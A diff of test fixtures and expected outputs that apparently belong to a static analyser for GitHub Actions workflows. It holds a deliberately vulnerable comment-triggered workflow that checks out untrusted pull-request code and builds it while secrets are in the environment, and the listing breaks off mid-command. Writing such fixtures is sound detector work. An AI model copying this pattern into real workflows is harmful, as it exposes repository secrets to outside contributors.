.github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | @@ -282,6 +337,82 @@ parentNodes | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:1:1:89:29 | on: | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:9:5:89:29 | Job: Test | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:85:9:89:29 | Run Step | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:1:5:1:8 | push | .github/workflows/poisonable_steps.yml:1:5:1:8 | push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:14:5:26 | ubuntu-latest | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:5:1:8 | push | @@ -438,6 +569,45 @@ cfgNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | enter on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | exit on: push (normal) | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | @@ -516,6 +686,41 @@ dfNodes | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | @@ -595,6 +800,41 @@ nodeLocations | .github/workflows/multiline.yml:79:14:84:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:79:14:84:29 | .github/workflows/multiline.yml@79:14:84:29 | | .github/workflows/multiline.yml:85:9:89:29 | Run Step | .github/workflows/multiline.yml:85:9:89:29 | .github/workflows/multiline.yml@85:9:89:29 | | .github/workflows/multiline.yml:86:14:89:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/multiline.yml:86:14:89:29 | .github/workflows/multiline.yml@86:14:89:29 | +| .github/workflows/poisonable_steps.yml:5:5:23:93 | Job: local_commands | .github/workflows/poisonable_steps.yml:5:5:23:93 | .github/workflows/poisonable_steps.yml@5:5:23:93 | +| .github/workflows/poisonable_steps.yml:7:9:8:6 | Run Step | .github/workflows/poisonable_steps.yml:7:9:8:6 | .github/workflows/poisonable_steps.yml@7:9:8:6 | +| .github/workflows/poisonable_steps.yml:7:14:7:30 | venv/bin/activate | .github/workflows/poisonable_steps.yml:7:14:7:30 | .github/workflows/poisonable_steps.yml@7:14:7:30 | +| .github/workflows/poisonable_steps.yml:8:9:9:6 | Run Step | .github/workflows/poisonable_steps.yml:8:9:9:6 | .github/workflows/poisonable_steps.yml@8:9:9:6 | +| .github/workflows/poisonable_steps.yml:8:14:8:32 | . venv/bin/activate | .github/workflows/poisonable_steps.yml:8:14:8:32 | .github/workflows/poisonable_steps.yml@8:14:8:32 | +| .github/workflows/poisonable_steps.yml:9:9:10:6 | Run Step | .github/workflows/poisonable_steps.yml:9:9:10:6 | .github/workflows/poisonable_steps.yml@9:9:10:6 | +| .github/workflows/poisonable_steps.yml:9:14:9:42 | echo foo; . venv/bin/activate | .github/workflows/poisonable_steps.yml:9:14:9:42 | .github/workflows/poisonable_steps.yml@9:14:9:42 | +| .github/workflows/poisonable_steps.yml:10:9:11:6 | Run Step | .github/workflows/poisonable_steps.yml:10:9:11:6 | .github/workflows/poisonable_steps.yml@10:9:11:6 | +| .github/workflows/poisonable_steps.yml:10:14:10:41 | echo foo;. venv/bin/activate | .github/workflows/poisonable_steps.yml:10:14:10:41 | .github/workflows/poisonable_steps.yml@10:14:10:41 | +| .github/workflows/poisonable_steps.yml:11:9:12:6 | Run Step | .github/workflows/poisonable_steps.yml:11:9:12:6 | .github/workflows/poisonable_steps.yml@11:9:12:6 | +| .github/workflows/poisonable_steps.yml:11:14:11:42 | echo foo \|. venv/bin/activate | .github/workflows/poisonable_steps.yml:11:14:11:42 | .github/workflows/poisonable_steps.yml@11:14:11:42 | +| .github/workflows/poisonable_steps.yml:12:9:13:6 | Run Step | .github/workflows/poisonable_steps.yml:12:9:13:6 | .github/workflows/poisonable_steps.yml@12:9:13:6 | +| .github/workflows/poisonable_steps.yml:12:14:12:32 | ./venv/bin/activate | .github/workflows/poisonable_steps.yml:12:14:12:32 | .github/workflows/poisonable_steps.yml@12:14:12:32 | +| .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | .github/workflows/poisonable_steps.yml:13:9:14:6 | .github/workflows/poisonable_steps.yml@13:9:14:6 | +| .github/workflows/poisonable_steps.yml:13:14:13:36 | sh venv/bin/activate.sh | .github/workflows/poisonable_steps.yml:13:14:13:36 | .github/workflows/poisonable_steps.yml@13:14:13:36 | +| .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | .github/workflows/poisonable_steps.yml:14:9:15:6 | .github/workflows/poisonable_steps.yml@14:9:15:6 | +| .github/workflows/poisonable_steps.yml:14:14:14:44 | echo $(sh venv/bin/activate.sh) | .github/workflows/poisonable_steps.yml:14:14:14:44 | .github/workflows/poisonable_steps.yml@14:14:14:44 | +| .github/workflows/poisonable_steps.yml:15:9:16:6 | Run Step | .github/workflows/poisonable_steps.yml:15:9:16:6 | .github/workflows/poisonable_steps.yml@15:9:16:6 | +| .github/workflows/poisonable_steps.yml:15:14:15:56 | echo foo; sh venv/bin/activate.sh; echo bar | .github/workflows/poisonable_steps.yml:15:14:15:56 | .github/workflows/poisonable_steps.yml@15:14:15:56 | +| .github/workflows/poisonable_steps.yml:16:9:17:6 | Run Step | .github/workflows/poisonable_steps.yml:16:9:17:6 | .github/workflows/poisonable_steps.yml@16:9:17:6 | +| .github/workflows/poisonable_steps.yml:16:14:16:56 | echo foo \| sh venv/bin/activate.sh > output | .github/workflows/poisonable_steps.yml:16:14:16:56 | .github/workflows/poisonable_steps.yml@16:14:16:56 | +| .github/workflows/poisonable_steps.yml:17:9:18:6 | Run Step | .github/workflows/poisonable_steps.yml:17:9:18:6 | .github/workflows/poisonable_steps.yml@17:9:18:6 | +| .github/workflows/poisonable_steps.yml:17:14:17:40 | python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:17:14:17:40 | .github/workflows/poisonable_steps.yml@17:14:17:40 | +| .github/workflows/poisonable_steps.yml:18:9:19:6 | Run Step | .github/workflows/poisonable_steps.yml:18:9:19:6 | .github/workflows/poisonable_steps.yml@18:9:19:6 | +| .github/workflows/poisonable_steps.yml:18:14:18:50 | echo foo; python venv/bin/activate.py | .github/workflows/poisonable_steps.yml:18:14:18:50 | .github/workflows/poisonable_steps.yml@18:14:18:50 | +| .github/workflows/poisonable_steps.yml:19:9:20:6 | Run Step | .github/workflows/poisonable_steps.yml:19:9:20:6 | .github/workflows/poisonable_steps.yml@19:9:20:6 | +| .github/workflows/poisonable_steps.yml:19:14:19:29 | pnpm run test:ct | .github/workflows/poisonable_steps.yml:19:14:19:29 | .github/workflows/poisonable_steps.yml@19:14:19:29 | +| .github/workflows/poisonable_steps.yml:20:9:21:6 | Run Step | .github/workflows/poisonable_steps.yml:20:9:21:6 | .github/workflows/poisonable_steps.yml@20:9:21:6 | +| .github/workflows/poisonable_steps.yml:20:14:20:73 | pip install nbformat && python scripts/generate_notebooks.py | .github/workflows/poisonable_steps.yml:20:14:20:73 | .github/workflows/poisonable_steps.yml@20:14:20:73 | +| .github/workflows/poisonable_steps.yml:21:9:22:6 | Run Step | .github/workflows/poisonable_steps.yml:21:9:22:6 | .github/workflows/poisonable_steps.yml@21:9:22:6 | +| .github/workflows/poisonable_steps.yml:21:14:21:78 | python scripts/generate_theme.py --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:21:14:21:78 | .github/workflows/poisonable_steps.yml@21:14:21:78 | +| .github/workflows/poisonable_steps.yml:22:9:23:6 | Run Step | .github/workflows/poisonable_steps.yml:22:9:23:6 | .github/workflows/poisonable_steps.yml@22:9:23:6 | +| .github/workflows/poisonable_steps.yml:22:14:22:76 | ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:22:14:22:76 | .github/workflows/poisonable_steps.yml@22:14:22:76 | +| .github/workflows/poisonable_steps.yml:23:9:23:93 | Run Step | .github/workflows/poisonable_steps.yml:23:9:23:93 | .github/workflows/poisonable_steps.yml@23:9:23:93 | +| .github/workflows/poisonable_steps.yml:23:14:23:92 | bundle run exec ruby scripts/generate_theme.rb --outfile js/storybook/theme.css | .github/workflows/poisonable_steps.yml:23:14:23:92 | .github/workflows/poisonable_steps.yml@23:14:23:92 | | .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | | .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:20:8:50 | steps.step.outputs.value | .github/workflows/test.yml:8:20:8:50 | .github/workflows/test.yml@8:20:8:50 | @@ -615,6 +855,7 @@ nodeLocations scopes | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | | .github/workflows/multiline.yml:1:1:89:29 | on: | +| .github/workflows/poisonable_steps.yml:1:1:23:93 | on: push | | .github/workflows/test.yml:1:1:40:53 | on: push | sources | ahmadnassri/action-changed-files | * | output.files | filename | manual | diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml new file mode 100644 index 000000000000..44f5602ee061 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test7.yml @@ -0,0 +1,58 @@ +name: Benchmark + +on: + issue_comment: + types: [created] + +env: + TURBO_TOKEN: ${{ secrets.TURBO_TOKEN }} + TURBO_TEAM: ${{ secrets.TURBO_TEAM }} + FORCE_COLOR: true + +jobs: + benchmark: + if: ${{ github.repository_owner == 'foo' && github.event.issue.pull_request && startsWith(github.event.comment.body, '!bench') }} + runs-on: ubuntu-latest + permissions: + contents: read + steps: + - uses: actions/checkout@v4 + with: + persist-credentials: false + ref: refs/pull/${{ github.event.issue.number }}/head + + - name: Setup PNPM + uses: pnpm/action-setup@v3 + + - name: Setup Node + uses: actions/setup-node@v4 + with: + node-version: 18 + cache: "pnpm" + + - name: Install dependencies + run: pnpm install + + - name: Build Packages + run: pnpm run build + + - name: Get bench command + id: bench-command + env: + # protects from untrusted user input and command injection + COMMENT: ${{ github.event.comment.body }} + run: | + benchcmd=$(echo "$COMMENT" | grep '!bench' | awk -F ' ' '{print $2}') + echo "bench=$benchcmd" >> $GITHUB_OUTPUT + shell: bash + + - name: Run benchmark + id: benchmark-pr + run: | + result=$(pnpm 